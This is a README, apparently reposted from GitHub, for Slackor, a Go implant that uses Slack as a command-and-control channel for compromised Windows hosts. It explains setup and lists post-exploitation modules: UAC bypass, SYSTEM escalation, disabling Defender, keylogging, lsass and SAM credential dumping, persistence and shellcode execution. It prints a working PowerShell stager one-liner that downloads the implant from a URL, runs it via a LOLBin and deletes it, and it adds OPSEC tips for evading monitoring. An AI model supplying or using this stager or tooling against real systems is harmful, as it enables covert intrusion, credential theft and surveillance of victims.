/ Command Line

A Golang implant that uses Slack as a command and control server

A Golang implant that uses Slack as a command and control server

Slackor

A Golang implant that uses Slack as a command and control channel.

This project was inspired by Gcat and Twittor.

Slackorv

This tool is released as a proof of concept. Be sure to read and understand the Slack App Developer Policy before creating any Slack apps.

Setup

Note: The server is written in Python 3

For this to work you need:

  • A Slack Workspace

  • Register an app with the following permissions:

    • channels:read
    • channels:history
    • channels:write
    • files:write:user
    • files:read
  • Create a bot

This repo contains five files:

  • install.sh Installs dependancies
  • setup.py The script to create the slack channels, database, and implant
  • server.py The Slackor server, designed to be ran on Linux
  • template.go Template for the generated implant
  • requirements.txt Python dependencies (installed automatically)

To get started:

  • Run install.sh
  • Run setup.py
    • Supply the OAuth Access Token and Bot User OAuth Access Token from your app

After running the script successfully, a file agent.exe will be created. It will be a 64bit Go binary packed with UPX.

After starting server.py on a Linux host, execute agent.exe on your target Windows host.

Run the "stager" module to generate a one-liner and other droppers.

powershell.exe iwr [URL] -o C:\Users\Public\[NAME].exe; forfiles.exe /p c:\windows\system32 /m svchost.exe /c C:\Users\Public\[NAME]; timeout 2; del C:\Users\Public\[NAME].exe

This will execute InvokeWebRequest(PS v.3+) to download the payload, execute it using a LOLBin, and then delete itself once killed. This is a working example but the command can tweaked to use another download method or execution method.

Usage

Type "help" or press [TAB] to see a list of available commands. type "help [COMMAND]" to see a description of that command.

(Slackor)

  • Help - Displays help menu
  • interact - Interact with an agent
  • list - List all registered agents
  • remove - kill and remove an agent
  • revive - Sends a signal to all agents to re-register with the server
  • stager - Generates a one-liner to download an execute the implant
  • quit - Quit the program
  • wipefiles - Deletes all uploaded files out of Slack

Once an agent checks in, you can interact with it.
Use "interact [AGENT] to enter into an agent prompt. Type "help" or press [TAB] to see a list of available commands.

(Slackor:AGENT)

  • back - Return to the main menu
  • beacon - change the amount of time between each check-in by an agent (default is 5 seconds)
  • bypassuac - Attempts to spawn a high integrity agent
  • cleanup - Removes persistence artifacts
  • clipboard - Retreives the contents of the clipboard
  • defanger - Attempts to de-fang Windows Defender
  • download - Download a file from the agent to the Slackor server
  • duplicate - Causes the agent to spawn another invocation of itself
  • getsystem - Spawns an agent as NTAUTHORITY/SYSTEM
  • help - Displays help menu
  • keyscan - Starts a keylogger on the agent
  • kill - Kill the agent
  • minidump - Dumps memory from lsass.exe and downloads it
  • persist - Creates persistence by implanting a binary in an ADS
  • samdump - Attempts to dump the SAM file for offline hash extraction
  • screenshot - Takes a screenshot of the desktop and retrieves it
  • shellcode - Executes x64 raw shellcode
  • sleep - Cause the agent to sleep once (enter time in seconds)
  • sysinfo - Displays the current user, OS version, system architecture, and number of CPU cores
  • upload - Upload a file to the agent from the Slackor server
  • wget - Pull down arbitrary files over HTTP/HTTPS

OPSEC Considerations

Command output and downloaded files are AES encrypted in addition to TLS transport encryption.

Modules will warn you before performing tasks that write to disk.
When executing shell commands, take note that cmd.exe will be executed. This may be monitored on the host.
Here are several OPSEC safe commands that will NOT execute cmd.exe:

  • cat - prints file content
  • cd - change directory
  • hostname - Displays the name of the host
  • ifconfig - Displays interface information
  • ls - list directory contents
  • mkdir - Creates a directory
  • pwd - prints the current working directory
  • rm - removes a file
  • rmdir - removes a directory
  • whoami / getuid - prints the current user

GitHub